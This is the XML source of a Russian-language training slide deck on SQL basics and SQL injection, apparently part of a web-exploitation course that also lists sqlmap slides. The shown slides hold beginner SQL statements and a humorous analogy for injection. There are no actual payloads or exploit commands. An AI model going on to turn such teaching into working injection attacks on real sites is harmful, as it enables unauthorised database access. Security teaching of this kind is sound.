              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SELECT * FROM '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b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1592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C5624B-17B5-5A08-EA26-8FF24219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937"/>
            <a:ext cx="10515600" cy="54390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Теперь напишем запрос на добавление в таблицу города нового города:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>ВСТАВЬ В ТАБЛИЦУ 'города' ЗНАЧЕНИЯ 'имя города' = 'Санкт-Петербург'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Перевод на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL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b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>INSERT INTO '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>cities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>' SET '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>' = 'Санкт-Петербург’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Эта команда создаст в таблице ‘города’ новую запись, где полю ‘имя города’ будет присвоено значение ‘Санкт-Петербург’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>С помощью SQL можно не только добавлять и читать данные, но и:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>удалять и обновлять записи в таблицах;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>создавать и редактировать сами таблицы;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>производить операции над данными: считать сумму, получать самое большое или малое значение, и так далее;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>настраивать работу сервера СУБД.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385812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394DB-7523-7DFC-BDE2-39184D00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ADD87-B3C1-6A4C-72F3-716253C2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Существует множество различных реляционных СУБД. Лучше всего подходит альтернативная программа — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>MySQL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отличие от многих аналогов, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> абсолютно бесплатна, может работать на серверах с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, обладает гораздо большей производительностью и безопасностью, что делает её идеальным кандидатом на роль базы данных в веб-разработке.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Подавляющее большинство сайтов и приложений на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> используют в качестве СУБД именно </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>MySQL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10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01339-27D5-A606-80A3-F8D19236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Потыкаем</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> вместе»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C6A61-9D29-0945-9756-643DF0E2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217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Предлагаю вам создать свою первую (а может и далеко не первую) БД.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Запускаем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mysql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ru-RU" dirty="0"/>
              <a:t>Сразу переходим в созданную нами базу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>test_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>”:</a:t>
            </a:r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test_base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ru-RU" dirty="0"/>
              <a:t>Не забываем ставить в конец команд «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>», как вы видите в конце первой команды я этот знак упустил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505E91-56ED-E258-50D7-EAD05F9F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64" y="1690688"/>
            <a:ext cx="4291515" cy="43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7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A5B5B8-6D2C-11DC-C94E-D8F0D104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Пришло время создать первые таблицы!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Для нашей базы создадим несколько таблиц: одна с именами, вторая с городами.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Переведём это описание на язык </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL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b="1" dirty="0" err="1"/>
              <a:t>name_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  id INT AUTO_INCREMENT PRIMARY KEY,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>name CHAR(32),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  age INT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b="1" dirty="0" err="1"/>
              <a:t>city_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  id INT AUTO_INCREMENT PRIMARY KEY,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>city CHAR(32)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);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AB93DE-285A-2AC7-1F4D-6B8E0232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54" y="2040605"/>
            <a:ext cx="5480662" cy="11307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D830D-A599-0C56-4559-61888751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754" y="4106033"/>
            <a:ext cx="3999498" cy="11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A8B1FB-7E9A-CED4-0AC7-0FB2F2EE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172"/>
            <a:ext cx="5867400" cy="58257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Добавим в наши базы какую-нибудь информацию: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Попробуем вывести ее оператором </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>select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При добавлении записи очень легко совершить ошибку: сделать опечатку, не указать значение для одного из полей, и так далее.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Естественно, язык </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> предлагает возможности для редактирования уже созданных записей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Чтобы исправить эту ошибку, нужно использовать оператор обновления — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>UPDATE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Запрос с этим оператором позволяет обновить значение одного или нескольких полей в существующей записи. Выглядит он так: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UPDATE &lt;имя таблицы&gt; SET &lt;имя столбца1&gt; = &lt;значение2&gt;, &lt;имя столбца2&gt; = &lt;значение2&gt;... WHERE &lt;имя столбца&gt; = &lt;значение&gt;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D1F752-A3B0-2634-7253-3E63E729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51171"/>
            <a:ext cx="5229225" cy="2562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021751-D396-1B9C-D86C-B54A85DC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913396"/>
            <a:ext cx="3400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FF48D-B017-85C4-06F1-25CFE64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такое SQL инъекция?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22589E-6C30-44F0-8AD1-51B205C3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Говоря простым языком — это атака на базу данных, которая позволит выполнить некоторое действие, которое не планировалось создателем скрипта. Пример из жизни:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Отец, написал в записке маме, чтобы она дала Васе 100 рублей и положил её на стол. Переработав это в шуточный SQL язык, мы получим:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>ДОСТАНЬ ИЗ кошелька 100 РУБЛЕЙ И ДАЙ ИХ Васе</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Так-как отец плохо написал записку (Корявый почерк), и оставил её на столе, её увидел брат Васи — Петя. Петя, будучи хакер, дописал там «ИЛИ Пете» и получился такой запрос:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>ДОСТАНЬ ИЗ кошелька 100 РУБЛЕЙ И ДАЙ ИХ Васе ИЛИ Пете</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Мама прочитав записку, решила, что Васе она давала деньги вчера и дала 100 рублей Пете. Вот простой пример SQL инъекции из жизни :) Не фильтруя данные (Мама еле разобрала почерк), Петя добился профита.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2093560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1851</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>112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Эксплуатация веб-уязвимостей Основы запросов SQL, SQL injection, sqlmap</vt:lpstr>
      <vt:lpstr>Введение</vt:lpstr>
      <vt:lpstr>Язык SQL — это в первую очередь язык запросов</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>MySQL</vt:lpstr>
      <vt:lpstr>«Потыкаем вместе»</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Что же такое SQL инъекция?</vt:lpstr>
      <vt:lpstr>Числовой входящий параметр</vt:lpstr>
      <vt:lpstr>Строковой входящий параметр</vt:lpstr>
      <vt:lpstr>SQLMAP</vt:lpstr>
      <vt:lpstr>Фишки SQLMAP</vt:lpstr>
      <vt:lpstr>Реальный пример из моей практики</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>В заключении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49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-18T22:46:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-20T22:38:25Z</dcterms:modified>
</cp:coreProperties>
</file>